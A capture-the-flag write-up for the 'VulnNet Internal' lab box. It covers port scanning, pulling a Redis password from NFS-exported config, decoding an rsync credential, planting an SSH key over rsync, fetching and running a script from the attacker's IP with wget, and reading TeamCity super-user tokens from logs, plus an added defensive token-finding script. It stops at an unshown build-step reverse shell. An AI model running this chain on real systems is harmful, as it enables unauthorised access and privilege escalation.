CTF VulnNet Internal

nmap

nmap -p- -T5 -sV -vvv 10.10.210.193

Output:

PORT      STATE    SERVICE     REASON      VERSION
22/tcp    open     ssh         syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp   open     rpcbind     syn-ack     2-4 (RPC #100000)
139/tcp   open     netbios-ssn syn-ack     Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn syn-ack     Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
873/tcp   open     rsync       syn-ack     (protocol version 31)
2049/tcp  open     nfs_acl     syn-ack     3 (RPC #100227)
6379/tcp  open     redis       syn-ack     Redis key-value store
9090/tcp  filtered zeus-admin  no-response
44305/tcp open     nlockmgr    syn-ack     1-4 (RPC #100021)
50597/tcp open     mountd      syn-ack     1-3 (RPC #100005)
55125/tcp open     mountd      syn-ack     1-3 (RPC #100005)
58261/tcp open     mountd      syn-ack     1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

SMB

smbclient //10.10.210.193/shares -U "guest"

NFS

sudo pacman -S nfs-utils
sudo mount -t nfs 10.10.210.193:/opt/conf /home/peanutstick/Documents/CTF/THM/vulnet_internal/mount

The exported config files are interesting: they include the Redis configuration.
Let's grab the password from it.

B65Hx562F@ggAZ@F

Redis

https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

nc -vn 10.10.210.193 6379
AUTH B65Hx562F@ggAZ@F
SELECT 0
KEYS *
GET "internal flag"


Get “authlist”:

LRANGE "authlist" 0 -1

Decode the base64 string:

echo QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== | base64 -d

Output:

Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

Rsync

List the files:
rsync -av --list-only rsync://10.10.210.193

Copy files.
rsync -av rsync://rsync-connect@10.10.210.193/files ./files


We have the flag; note that tree doesn't list hidden files.

https://medium.com/r3d-buck3t/attack-insecure-rsync-service-928951af34ed
There is a .ssh directory, so we can upload an authorized_keys file to connect via SSH.

ssh-keygen -t rsa


Then upload it:

rsync authorized_keys rsync://rsync-connect@10.10.210.193/files/sys-internal/.ssh

Connect via SSH:

ssh -i A_rsa sys-internal@10.10.210.193

SSH

lse.sh

Then:

wget http://10.8.50.167:8000/lse.sh
chmod +x *
./lse.sh


Yeah, but I don't have my password.

8111

Port forwarding

https://hideandsec.sh/books/cheatsheets-82c/page/pivoting

ss

Port 8111 is open locally, so forward it through the SSH session (local port forwarding, -L, not -D):

ssh -i A_rsa sys-internal@10.10.210.193 -L 8111:127.0.0.1:8111 -N

http://127.0.0.1:8111/login.html

Click on “as a Super user”; the token it asks for is written to the TeamCity logs on the box:

cd /TeamCity/logs
grep -rnw '.' -ie "token" --color=always 2> /dev/null

Output:

./catalina.out:56:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:57:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:1402:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
./catalina.out:1457:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
./catalina.out:1526:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
./catalina.out:1583:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
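As an added example (not part of the original writeup), a small Python log monitor that does what the grep above does programmatically: it pulls every super-user token TeamCity has written to catalina.out, records the lines each one appears on, and picks out the most recent one. This is the check a defender would run or alert on, since anyone who can read that log gets full admin on the server. The log lines are constructed samples, not the real file.

```python
import re

# Message TeamCity writes to catalina.out when it generates a super-user token.
TOKEN_RE = re.compile(r"\[TeamCity\] Super user authentication token: (\d+)")

# Constructed sample lines modelled on the grep output above (not real log data).
SAMPLE_LOG = """\
[TeamCity] Server started
[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)
[TeamCity] Build agent connected
[TeamCity] Super user authentication token: 2222222222222222222 (use empty username with the token as the password to access the server)
""".splitlines()

def find_tokens(lines):
    """Map each leaked token to the 1-based line numbers it appears on,
    in order of first appearance (the real log repeats the same token)."""
    found = {}
    for lineno, line in enumerate(lines, start=1):
        m = TOKEN_RE.search(line)
        if m:
            found.setdefault(m.group(1), []).append(lineno)
    return found

def current_token(lines):
    """The token logged last is the one the running server accepts
    (TeamCity generates a fresh one on each start)."""
    found = find_tokens(lines)
    if not found:
        return None
    return max(found, key=lambda tok: found[tok][-1])

def report(lines):
    """Human-readable summary; tokens are masked so the report itself
    does not become another copy of the secret."""
    found = find_tokens(lines)
    out = []
    for tok, nums in found.items():
        masked = tok[:4] + "..." + tok[-4:]
        out.append(f"{masked}: {len(nums)} occurrence(s) at line(s) {nums}")
    if found:
        out.append(f"current token ends in ...{current_token(lines)[-4:]}")
    return out

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```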


Once the command is in the build step, start the listener, then click Run.